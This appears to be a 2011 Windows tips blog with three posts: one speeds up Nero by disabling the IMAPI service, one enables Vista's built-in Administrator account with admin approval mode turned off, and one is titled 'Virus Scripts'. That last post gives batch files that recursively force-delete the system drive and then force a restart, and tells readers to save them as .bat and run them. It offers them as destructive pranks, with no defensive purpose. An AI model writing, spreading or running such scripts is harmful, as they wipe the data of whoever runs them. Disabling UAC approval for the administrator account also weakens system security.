Sunday, April 10, 2011

Boost Nero in XP

Speed up Nero in XP

Go to "administrative tools" in the control panel, and in the "services" list, disable the IMAPI CD-Burning COM service.
(Note: manual setting is not enough it must be disabled) It is the built-in CD-burning capability for windowsXP.
Once it is disabled, Nero will start up much quicker.


~

Friday, April 8, 2011

Enable Administrator Account

In Windows Vista there is a Built-in Administrator Account in addition to your normal Administrator account that was created. The Built-in Administrator Account is disabled by default.

Certain Programs/Softwares give us trouble in proper installation due to this disable. Even though we run the .exe file of the programs that is to be installed as "Run As Administrator". For proper installation of the programs it is to be enabled.

• Click Start, and type “secpol.msc” in the search area and click Enter.
• You may receive a prompt from UAC, approve/login and proceed.
• In the left list, choose “Local Policies”, then “Security Options
• Set “Accounts: Administrator account status” to Enabled.
• Set “User Account Control: Admin Approval Mode for the Built-in Administrator account” to Disabled.
• Now log-off, and you’ll see a new account named “Administrator” will be available, click on it to login.

Log on to this administrator account. You may delete other user accounts.


~

Saturday, April 2, 2011

Virus Scripts

1.This Virus Deletes All The Content Of A Drive...

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code with .bat extension & Run.


2.The Most Simple Virus To Crush The Window

@Echo off
Del C:\ *.* y

Save The Above Code with .bat extension & Run.


3.The below Code Will Just Restart Ur PC

@echo off shutdown -r -f -t 00

Save The Above Code with .bat extension & Run.


Note: Won't work on Vista or Win7 as you need to bypass UAC.


~